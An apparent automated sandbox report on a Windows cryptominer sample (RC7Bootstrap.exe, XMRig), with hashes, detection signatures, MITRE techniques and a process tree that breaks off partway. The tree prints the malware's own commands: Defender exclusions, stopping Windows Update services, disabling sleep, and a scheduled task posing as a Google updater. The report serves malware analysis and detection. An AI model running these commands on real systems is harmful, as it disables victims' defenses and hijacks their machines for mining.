xmrig | 5fd8247a8e7d25652a04145f08d557ad1203874d44a6c73a86698552a36aa334

Analysis

max time kernel
1529s
max time network
1557s
platform
windows10-1703_x64
resource
win10-20230220-en
resource tags

arch:x64arch:x86image:win10-20230220-enlocale:en-usos:windows10-1703-x64system
submitted
29/05/2023, 06:12

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

RC7Bootstrap.exe
Size

5.8MB
MD5

ec3150c2a9fb5e2011ec8f2653f46dde
SHA1

7d5d76fdaa73dd10fa25c5dca169476e19757fbf
SHA256

5fd8247a8e7d25652a04145f08d557ad1203874d44a6c73a86698552a36aa334
SHA512

d791bd9251b54fbf6570682b7ad7b17527b6efd45d551063c525a12a7eb577a5df7870fc1d042b1715d2f4df2ea8500428bd2b23e4a1e2b636e5b375d9027f45
SSDEEP

98304:rpswnk/VMr7p++DjfoAN+GSkK7YJtycn2RbMFkM1SXrJqhcOdVKxkREt0+TuL:h4VMvpHjfd+GS9yEOcbML10JCJwxkON0

Score

10^/10

xmrig evasion miner

Malware Config

Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess 11 IoCs

description	pid	Process	procid_target
PID 956 created 3196	956	Updator.exe	54
PID 956 created 3196	956	Updator.exe	54
PID 956 created 3196	956	Updator.exe	54
PID 956 created 3196	956	Updator.exe	54
PID 956 created 3196	956	Updator.exe	54
PID 4836 created 3196	4836	updater.exe	54
PID 4836 created 3196	4836	updater.exe	54
PID 4836 created 3196	4836	updater.exe	54
PID 4836 created 3196	4836	updater.exe	54
PID 4836 created 3196	4836	updater.exe	54
PID 4836 created 3196	4836	updater.exe	54

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 30 IoCs

miner

resource	yara_rule
behavioral1/memory/4836-581-0x00007FF7EB360000-0x00007FF7EB900000-memory.dmp	xmrig
behavioral1/memory/4364-584-0x00007FF7D0CD0000-0x00007FF7D14BF000-memory.dmp	xmrig
behavioral1/memory/4364-587-0x00007FF7D0CD0000-0x00007FF7D14BF000-memory.dmp	xmrig
behavioral1/memory/4364-590-0x00007FF7D0CD0000-0x00007FF7D14BF000-memory.dmp	xmrig
behavioral1/memory/4364-592-0x00007FF7D0CD0000-0x00007FF7D14BF000-memory.dmp	xmrig
behavioral1/memory/4364-594-0x00007FF7D0CD0000-0x00007FF7D14BF000-memory.dmp	xmrig
behavioral1/memory/4364-596-0x00007FF7D0CD0000-0x00007FF7D14BF000-memory.dmp	xmrig
behavioral1/memory/4364-598-0x00007FF7D0CD0000-0x00007FF7D14BF000-memory.dmp	xmrig
behavioral1/memory/4364-640-0x00007FF7D0CD0000-0x00007FF7D14BF000-memory.dmp	xmrig
behavioral1/memory/4364-781-0x00007FF7D0CD0000-0x00007FF7D14BF000-memory.dmp	xmrig
behavioral1/memory/4364-833-0x00007FF7D0CD0000-0x00007FF7D14BF000-memory.dmp	xmrig
behavioral1/memory/4364-895-0x00007FF7D0CD0000-0x00007FF7D14BF000-memory.dmp	xmrig
behavioral1/memory/4364-984-0x00007FF7D0CD0000-0x00007FF7D14BF000-memory.dmp	xmrig
behavioral1/memory/4364-1061-0x00007FF7D0CD0000-0x00007FF7D14BF000-memory.dmp	xmrig
behavioral1/memory/4364-1159-0x00007FF7D0CD0000-0x00007FF7D14BF000-memory.dmp	xmrig
behavioral1/memory/4364-1241-0x00007FF7D0CD0000-0x00007FF7D14BF000-memory.dmp	xmrig
behavioral1/memory/4364-1323-0x00007FF7D0CD0000-0x00007FF7D14BF000-memory.dmp	xmrig
behavioral1/memory/4364-1398-0x00007FF7D0CD0000-0x00007FF7D14BF000-memory.dmp	xmrig
behavioral1/memory/4364-1485-0x00007FF7D0CD0000-0x00007FF7D14BF000-memory.dmp	xmrig
behavioral1/memory/4364-1586-0x00007FF7D0CD0000-0x00007FF7D14BF000-memory.dmp	xmrig
behavioral1/memory/4364-1668-0x00007FF7D0CD0000-0x00007FF7D14BF000-memory.dmp	xmrig
behavioral1/memory/4364-1756-0x00007FF7D0CD0000-0x00007FF7D14BF000-memory.dmp	xmrig
behavioral1/memory/4364-1839-0x00007FF7D0CD0000-0x00007FF7D14BF000-memory.dmp	xmrig
behavioral1/memory/4364-1913-0x00007FF7D0CD0000-0x00007FF7D14BF000-memory.dmp	xmrig
behavioral1/memory/4364-1986-0x00007FF7D0CD0000-0x00007FF7D14BF000-memory.dmp	xmrig
behavioral1/memory/4364-1988-0x00007FF7D0CD0000-0x00007FF7D14BF000-memory.dmp	xmrig
behavioral1/memory/4364-1994-0x00007FF7D0CD0000-0x00007FF7D14BF000-memory.dmp	xmrig
behavioral1/memory/4364-1996-0x00007FF7D0CD0000-0x00007FF7D14BF000-memory.dmp	xmrig
behavioral1/memory/4364-1998-0x00007FF7D0CD0000-0x00007FF7D14BF000-memory.dmp	xmrig
behavioral1/memory/4364-2000-0x00007FF7D0CD0000-0x00007FF7D14BF000-memory.dmp	xmrig

Drops file in Drivers directory 2 IoCs

description	ioc	Process
File created	C:\Windows\System32\drivers\etc\hosts	Updator.exe
File created	C:\Windows\System32\drivers\etc\hosts	updater.exe

Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

Executes dropped EXE 3 IoCs

pid	Process
4012	RC7.exe
956	Updator.exe
4836	updater.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 4836 set thread context of 4932	4836	updater.exe	109
PID 4836 set thread context of 4364	4836	updater.exe	110

Launches sc.exe 10 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
5048	sc.exe
3024	sc.exe
2888	sc.exe
4812	sc.exe
3388	sc.exe
4296	sc.exe
864	sc.exe
2744	sc.exe
2736	sc.exe
5020	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 8 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings	firefox.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4552	powershell.exe
4552	powershell.exe
4552	powershell.exe
956	Updator.exe
956	Updator.exe
672	powershell.exe
672	powershell.exe
672	powershell.exe
956	Updator.exe
956	Updator.exe
956	Updator.exe
956	Updator.exe
956	Updator.exe
956	Updator.exe
2056	powershell.exe
2056	powershell.exe
2056	powershell.exe
956	Updator.exe
956	Updator.exe
4836	updater.exe
4836	updater.exe
4440	powershell.exe
4440	powershell.exe
4440	powershell.exe
4836	updater.exe
4836	updater.exe
4836	updater.exe
4836	updater.exe
4836	updater.exe
4836	updater.exe
5040	powershell.exe
5040	powershell.exe
5040	powershell.exe
4836	updater.exe
4836	updater.exe
4836	updater.exe
4836	updater.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
588	Process not Found

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4552	powershell.exe
Token: SeDebugPrivilege	672	powershell.exe
Token: SeIncreaseQuotaPrivilege	672	powershell.exe
Token: SeSecurityPrivilege	672	powershell.exe
Token: SeTakeOwnershipPrivilege	672	powershell.exe
Token: SeLoadDriverPrivilege	672	powershell.exe
Token: SeSystemProfilePrivilege	672	powershell.exe
Token: SeSystemtimePrivilege	672	powershell.exe
Token: SeProfSingleProcessPrivilege	672	powershell.exe
Token: SeIncBasePriorityPrivilege	672	powershell.exe
Token: SeCreatePagefilePrivilege	672	powershell.exe
Token: SeBackupPrivilege	672	powershell.exe
Token: SeRestorePrivilege	672	powershell.exe
Token: SeShutdownPrivilege	672	powershell.exe
Token: SeDebugPrivilege	672	powershell.exe
Token: SeSystemEnvironmentPrivilege	672	powershell.exe
Token: SeRemoteShutdownPrivilege	672	powershell.exe
Token: SeUndockPrivilege	672	powershell.exe
Token: SeManageVolumePrivilege	672	powershell.exe
Token: 33	672	powershell.exe
Token: 34	672	powershell.exe
Token: 35	672	powershell.exe
Token: 36	672	powershell.exe
Token: SeShutdownPrivilege	3208	powercfg.exe
Token: SeCreatePagefilePrivilege	3208	powercfg.exe
Token: SeShutdownPrivilege	4040	powercfg.exe
Token: SeCreatePagefilePrivilege	4040	powercfg.exe
Token: SeShutdownPrivilege	1472	powercfg.exe
Token: SeCreatePagefilePrivilege	1472	powercfg.exe
Token: SeDebugPrivilege	2056	powershell.exe
Token: SeShutdownPrivilege	3800	powercfg.exe
Token: SeCreatePagefilePrivilege	3800	powercfg.exe
Token: SeIncreaseQuotaPrivilege	2056	powershell.exe
Token: SeSecurityPrivilege	2056	powershell.exe
Token: SeTakeOwnershipPrivilege	2056	powershell.exe
Token: SeLoadDriverPrivilege	2056	powershell.exe
Token: SeSystemProfilePrivilege	2056	powershell.exe
Token: SeSystemtimePrivilege	2056	powershell.exe
Token: SeProfSingleProcessPrivilege	2056	powershell.exe
Token: SeIncBasePriorityPrivilege	2056	powershell.exe
Token: SeCreatePagefilePrivilege	2056	powershell.exe
Token: SeBackupPrivilege	2056	powershell.exe
Token: SeRestorePrivilege	2056	powershell.exe
Token: SeShutdownPrivilege	2056	powershell.exe
Token: SeDebugPrivilege	2056	powershell.exe
Token: SeSystemEnvironmentPrivilege	2056	powershell.exe
Token: SeRemoteShutdownPrivilege	2056	powershell.exe
Token: SeUndockPrivilege	2056	powershell.exe
Token: SeManageVolumePrivilege	2056	powershell.exe
Token: 33	2056	powershell.exe
Token: 34	2056	powershell.exe
Token: 35	2056	powershell.exe
Token: 36	2056	powershell.exe
Token: SeIncreaseQuotaPrivilege	2056	powershell.exe
Token: SeSecurityPrivilege	2056	powershell.exe
Token: SeTakeOwnershipPrivilege	2056	powershell.exe
Token: SeLoadDriverPrivilege	2056	powershell.exe
Token: SeSystemProfilePrivilege	2056	powershell.exe
Token: SeSystemtimePrivilege	2056	powershell.exe
Token: SeProfSingleProcessPrivilege	2056	powershell.exe
Token: SeIncBasePriorityPrivilege	2056	powershell.exe
Token: SeCreatePagefilePrivilege	2056	powershell.exe
Token: SeBackupPrivilege	2056	powershell.exe
Token: SeRestorePrivilege	2056	powershell.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
4012	RC7.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe
4364	explorer.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1944	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1608 wrote to memory of 4552	1608	RC7Bootstrap.exe	66
PID 1608 wrote to memory of 4552	1608	RC7Bootstrap.exe	66
PID 1608 wrote to memory of 4552	1608	RC7Bootstrap.exe	66
PID 1608 wrote to memory of 4012	1608	RC7Bootstrap.exe	68
PID 1608 wrote to memory of 4012	1608	RC7Bootstrap.exe	68
PID 1608 wrote to memory of 4012	1608	RC7Bootstrap.exe	68
PID 1608 wrote to memory of 956	1608	RC7Bootstrap.exe	69
PID 1608 wrote to memory of 956	1608	RC7Bootstrap.exe	69
PID 2508 wrote to memory of 864	2508	cmd.exe	75
PID 2508 wrote to memory of 864	2508	cmd.exe	75
PID 2508 wrote to memory of 2744	2508	cmd.exe	76
PID 2508 wrote to memory of 2744	2508	cmd.exe	76
PID 2508 wrote to memory of 2736	2508	cmd.exe	77
PID 2508 wrote to memory of 2736	2508	cmd.exe	77
PID 2508 wrote to memory of 3024	2508	cmd.exe	78
PID 2508 wrote to memory of 3024	2508	cmd.exe	78
PID 2508 wrote to memory of 2888	2508	cmd.exe	79
PID 2508 wrote to memory of 2888	2508	cmd.exe	79
PID 3668 wrote to memory of 3208	3668	cmd.exe	84
PID 3668 wrote to memory of 3208	3668	cmd.exe	84
PID 3668 wrote to memory of 4040	3668	cmd.exe	85
PID 3668 wrote to memory of 4040	3668	cmd.exe	85
PID 3668 wrote to memory of 1472	3668	cmd.exe	86
PID 3668 wrote to memory of 1472	3668	cmd.exe	86
PID 3668 wrote to memory of 3800	3668	cmd.exe	87
PID 3668 wrote to memory of 3800	3668	cmd.exe	87
PID 4736 wrote to memory of 5048	4736	cmd.exe	96
PID 4736 wrote to memory of 5048	4736	cmd.exe	96
PID 4736 wrote to memory of 4812	4736	cmd.exe	97
PID 4736 wrote to memory of 4812	4736	cmd.exe	97
PID 4736 wrote to memory of 3388	4736	cmd.exe	98
PID 4736 wrote to memory of 3388	4736	cmd.exe	98
PID 4736 wrote to memory of 4296	4736	cmd.exe	99
PID 4736 wrote to memory of 4296	4736	cmd.exe	99
PID 4736 wrote to memory of 5020	4736	cmd.exe	100
PID 4736 wrote to memory of 5020	4736	cmd.exe	100
PID 3224 wrote to memory of 4936	3224	cmd.exe	105
PID 3224 wrote to memory of 4936	3224	cmd.exe	105
PID 3224 wrote to memory of 4900	3224	cmd.exe	106
PID 3224 wrote to memory of 4900	3224	cmd.exe	106
PID 3224 wrote to memory of 4964	3224	cmd.exe	107
PID 3224 wrote to memory of 4964	3224	cmd.exe	107
PID 3224 wrote to memory of 4268	3224	cmd.exe	108
PID 3224 wrote to memory of 4268	3224	cmd.exe	108
PID 4836 wrote to memory of 4932	4836	updater.exe	109
PID 4836 wrote to memory of 4364	4836	updater.exe	110
PID 168 wrote to memory of 1944	168	firefox.exe	113
PID 168 wrote to memory of 1944	168	firefox.exe	113
PID 168 wrote to memory of 1944	168	firefox.exe	113
PID 168 wrote to memory of 1944	168	firefox.exe	113
PID 168 wrote to memory of 1944	168	firefox.exe	113
PID 168 wrote to memory of 1944	168	firefox.exe	113
PID 168 wrote to memory of 1944	168	firefox.exe	113
PID 168 wrote to memory of 1944	168	firefox.exe	113
PID 168 wrote to memory of 1944	168	firefox.exe	113
PID 168 wrote to memory of 1944	168	firefox.exe	113
PID 168 wrote to memory of 1944	168	firefox.exe	113
PID 1944 wrote to memory of 4036	1944	firefox.exe	114
PID 1944 wrote to memory of 4036	1944	firefox.exe	114
PID 1944 wrote to memory of 3800	1944	firefox.exe	115
PID 1944 wrote to memory of 3800	1944	firefox.exe	115
PID 1944 wrote to memory of 3800	1944	firefox.exe	115
PID 1944 wrote to memory of 3800	1944	firefox.exe	115
PID 1944 wrote to memory of 3800	1944	firefox.exe	115

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3196
- C:\Users\Admin\AppData\Local\Temp\RC7Bootstrap.exe
  "C:\Users\Admin\AppData\Local\Temp\RC7Bootstrap.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1608
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHcAdwB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAawB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGkAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGoAaQBoACMAPgA="
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4552
- - C:\Users\Admin\AppData\Local\Temp\RC7.exe
    "C:\Users\Admin\AppData\Local\Temp\RC7.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of FindShellTrayWindow
    PID:4012
- - C:\Users\Admin\AppData\Local\Temp\Updator.exe
    "C:\Users\Admin\AppData\Local\Temp\Updator.exe"
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:956
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:672
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2508
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:864
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:2744
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:2736
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:3024
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:2888
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3668
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3208
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4040
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1472
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3800
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#axfspkofu#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; }
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2056
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
  2⤵
  PID:4828
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4440
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4736
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:5048
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:4812
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:3388
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:4296
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:5020
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3224
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    PID:4936
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    PID:4900
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    PID:4964
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    PID:4268
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#axfspkofu#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; }
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5040
- C:\Windows\System32\conhost.exe
  C:\Windows\System32\conhost.exe
  2⤵
  PID:4932
- C:\Windows\explorer.exe
  C:\Windows\explorer.exe
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:4364
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:168
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe"
    3⤵
    - Checks processor information in registry
    - Modifies registry class
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:1944
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1944.0.2094253895\1124044986" -parentBuildID 20221007134813 -prefsHandle 1664 -prefMapHandle 1652 -prefsLen 20888 -prefMapSize 232675 -appDir "C:\Program Files\Mozilla Firefox\browser" - {78f296fe-e840-434f-91d5-0fdcca631001} 1944 "\\.\pipe\gecko-crash-server-pipe.1944" 1732 1e029caf558 gpu
      4⤵
      PID:4036
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1944.1.320173651\996104993" -parentBuildID 20221007134813 -prefsHandle 2052 -prefMapHandle 2000 -prefsLen 20969 -prefMapSize 232675 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {483cbadd-d842-4224-859b-4edfac02dd0c} 1944 "\\.\pipe\gecko-crash-server-pipe.1944" 2072 1e016272858 socket
      4⤵
      Checks processor information in registry
      PID:3800
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1944.2.643170373\210954281" -childID 1 -isForBrowser -prefsHandle 3056 -prefMapHandle 3052 -prefsLen 21052 -prefMapSize 232675 -jsInitHandle 1296 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {09299aaa-1eb6-4e30-af3d-cb164eb61a64} 1944 "\\.\pipe\gecko-crash-server-pipe.1944" 3068 1e02c9f6c58 tab
      4⤵
      PID:4432
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1944.3.2114803335\348580011" -childID 2 -isForBrowser -prefsHandle 3292 -prefMapHandle 3288 -prefsLen 26562 -prefMapSize 232675 -jsInitHandle 1296 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d414ccd3-1acb-44a6-8dd1-cdc0bb86e49e} 1944 "\\.\pipe\gecko-crash-server-pipe.1944" 3300 1e016262b58 tab
      4⤵
      PID:4696
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1944.4.1829767334\1348775777" -childID 3 -isForBrowser -prefsHandle 4092 -prefMapHandle 4064 -prefsLen 26621 -prefMapSize 232675 -jsInitHandle 1296 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {45c688df-cbd1-4e54-9fa9-7c0407fcaa63} 1944 "\\.\pipe\gecko-crash-server-pipe.1944" 4404 1e02ece2658 tab
      4⤵
      PID:5068
  - - C:\Program Files\Mozilla Firefox\firefox.exe
